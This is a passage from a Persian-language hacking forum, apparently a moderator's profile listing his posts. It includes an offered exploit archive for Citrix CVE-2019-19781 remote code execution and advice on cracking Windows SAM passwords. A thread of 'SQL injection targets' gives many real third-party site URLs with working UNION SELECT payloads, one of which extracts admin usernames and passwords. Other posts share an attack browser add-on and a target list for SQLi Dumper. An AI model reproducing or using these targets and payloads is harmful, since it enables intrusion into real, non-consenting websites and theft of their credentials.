mownten

مدير بخش
  • تعداد ارسال ها

    292
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    69

آخرین بار برد mownten در 25 دی

mownten یکی از رکورد داران بیشترین تعداد پسند مطالب است !

درباره mownten

  • درجه

  • تاریخ تولد تعیین نشده

آخرین بازدید کنندگان نمایه

2,914 بازدید کننده نمایه
  1. سلام قابلیت تعویض پسورد ویندوز وجود داره ولی مشاهده خیر. میتونید از ابزار کرک برای کرک پسورد استفاده کنید. توی یه فایل به نام SAM ذخیره میشه.
  2. سلام روز بخیر. طی روزهای اخیر یک آسیب پذیری جدی از سرورهای مبتنی بر Citrix با کد cve 2019 19781 یافت شده که سطح بالایی از خطر رو دارا هست. در اینجا یک ویدیوی آموزشی در مورد استفاده از این اکسپلویت خدمتتون تقدیم میکنم. فرایند حمله: یافتن یک سرور مبتنی Citrix و IP آن استفاده از توزیع های لینکس (پیشنهادی) برای راحتی در حمله نیازمندیهای اکسپلویت: requests و netaddr در این حمله میتوانید اطلاعات یوزرهای روی سرور را به دست آورید. این اکسپلویت بصورت Remote کد را بر روی سرور اجرا میکند و خروجی را به شما می دهد. محتویات : ویدیو آموزشی + اکسپلویت رمز عبور: guardiran.org cve-2019-19781-master.zip cve-2019-19781-master.z01 cve-2019-19781-master.z02
  3. mownten

    اقدام از طرف guardiran

    دوست عزیز منظور شما از اقدام یا دیفیس اینه که حمله بکنیم به وبسایت های خارجی؟ خدمتتون عرض کنم که اولا قبل از هر دیفیس سیاسی میبایست هماهنگی با مدیران تیم انجام بشه چونکه بعدا مسئولیت هاش در ابعاد کوچک و بزرگ متوجه تیم و بخش مدیریتش میشه. دوما دیفیس مال سالها پیشه و مدت ها هست که از مد افتاده. علوم این حوزه خیلی پیشرفته تر شدن و شخص مهاجم بهتره به جای حمله هایی که جز گرفتن وقت چیز ددیگه ای در پیش نداره به افزایش و علم و اگاهی و تسلطش روی مهارتش بپردازه تا بتونه بعنوان یه شغل قبولش کنه. دیفیس برای آدم شغل ساز نیست. مهم پوله و اینکه از این دانش چطور بشه پول در آورد. شما ترجیح میدی سه سال از عمرت رو روی دیفیس 10هزار سایت خارجی بذاری یا مثلا به یادگیری پایتون و تحلیل داده بپردازی که بعدش بتونه رزومه سنگین بدی؟ بعضی اقدامات شاید برای وجهه ی تیم باشه ولی جلوی کسانی که جنگ دیفیس راه میندازن و توی سطح پایینی از عملیات هستن. سطح بالای عملیاتی فقط آموزش و یادگیری هست. امیدوارم حرفم رو واضح زده باشم. موفق و موید
  4. mownten

    اولین تجربه هک یا امنیتتون؟!؟

    سال 88 پیدا کردن یک باگ در بلوتوث HTC WILDFIRE S که به نوکیا گزارش دادم. اولین شل هم مربوط به باگ overflow توی پورت 445 یا 443 بود که یه ویدیو ازش درست کردم و گذاشتم توی بلاگفا و فیلتر شد و از دست رفت. از اولین آموزش های تصویری این مدلی توی سطح نت بود که انگشت شمار بهش تسلط داشتن. یک ساعت با سرعت 20کیلوبایت مینشستم تا متااسپلویت 2.3 با حجم 50 مگ دانلود بشه. اونم با دانلودر IE . هیع چه روزگاری.
  5. mownten

    تارگت های Sql Injection

    http://www.henmily.com/en/productlist.php?tid=15999999.9 union all select 1,2,3,4,5 http://www.coda-continuum.com/product/product.php?id=4999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 http://ssy.org/detail.php?id=' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 and '0'='1-- http://www.hk-waitat.com/web/product.php?cat=60999999.9 union all select 1,2,3 https://www.russianspares.com/products.php?cat=54999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16&page=10& http://www.nashgroup.co.in/product-detail.php?id=2999999.9 union all select 1,2,3,4,5,6,7 http://www.tomal.se/eng/prod.php?ID=64' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 and '0'='1-- http://www.natomusic.fr/artisans/jazz/artisans-detail.php?id=124' union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 and '0'='1-- http://www.cronigsrealestate.com/?content=forsale.detail&id=72999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 http://www.primatigonglobal.co.id/index.php?mib=product&id=1&title=Precisetech http://dreamrivershinhan.com/zb/view.php?uid=1&startPage=1&boardid=zb_notice http://www.koyakorea.com/m_view.php?ps_db=notice&ps_boid=155999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 http://www.koracing.net/viewproduct.php?folder=5&product=18999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 http://www.scantechproducts.com/en/product-list/product-list.php?cat1=5' and 1 and '0'='1-- http://www.smtmax.com/category.php?id=2999999.9 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 http://nanoentek.com/product.php?id=' union all select 1,2,3,4,5,6,7,8,9,10,11,12 and '0'='1--
  6. mownten

    تارگت های Sql Injection

    https://www.hawkeyetack.com/product-list.php?cid=1 نام دیتابیس : HTproducts
  7. mownten

    تارگت های Sql Injection

    https://www.achromicpoint.com/past-event.php?id=50' and 1 and '0'='1-- https://www.achromicpoint.com/past-event.php?id=-50%27+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x74626c5f61646d696e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+-
  8. mownten

    تارگت های Sql Injection

    https://www.achromicpoint.com/past-event.php?id=-50'+UNION+ALL+SELECT+1,(SELECT+GROUP_CONCAT(username,password+SEPARATOR+0x3c62723e)+FROM+tbl_admin),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+-
  9. mownten

    تارگت های Sql Injection

    http://www.henmily.com/en/productlist.php?tid=15999999.9 union all select 1,2,3,4,5
  10. دارم به این فکر میکنم که یه دوره بگذرونم و هر جلسه جزییاتش رو بذارم توی انجمن

    1. MR.wIzArD

      MR.wIzArD

      سلام

      فکر خوبیه اما خب پیشنهاد میکنم هروقت تایم آزاد داشتی از دوره ای که یاد گرفتی خودت آموزش ضبط کنی و به صورت شخصی آپلودش کنی !

    2. DeMoN

      DeMoN

      good idea 👌

    3. armanbabaei
  11. mownten

    افزونه Hackbar Professional

    سلام دوستان. از اونجایی که ظاهرا پیر شدیم تو جوونی گفتیم کار بقیه رو اقلا رو راه بندازیم. اینجا افزونه Hackbar Professional رو براتون پیوست کردم. باید بگم که این افزونه علاوه بر نسخه ی اصلیِ hackbar دارای اضافه هایی هست که توی حملات خیلی بدردتون میخوره. مثلا میتونید لینک رو با انواع bypasser هایی که داره تست کنید و نیازی به تایپ دستی نباشه ولی سعی کنید که کد ها رو حفظ کنید و درک داشته باشید نه اینکه فقط چند تا کلیک کرده باشید. ضمناً این افزونه روی Cyberfox 59 هم نصب میشه. سایبرفاکس رو بگیرید و این افزونه رو روش نصب کنید. رمز عبور : guardiran.org Hackbar Professional Moded by r3yz3 - guardiran.org.rar
  12. سر این موضوع بحث هست. ایشون حالا یه فعالیتی کرده اما موثر نیست. تاپیک قفل میکنم.
  13. سلام. با تشکر از حضور شما در انجمن اول باید بگم که اطلاعات تماس شما پاک میشه بدلیل مغایرت با ماهیت انجمن دوما اینکه این ویدیو که زحمت کشیدین (دستتون درد نکنه) و ساختین ، نامی از انجمن هم توش بردین و گفتین که عضو انجمن هستین یا خیر؟
  14. mownten

    تارگت های Sql Injection

    39-Target-for-Sqli Dumper.rarسلام. تعداد 39 تارگت آماده مربوط به Sqli Dumper تهیه کردم که میتونید باهاش تمرین کنید. فایل رو پیوست کردم که اگر خواستید import هم بکنید. رمز عبور : guardiran.org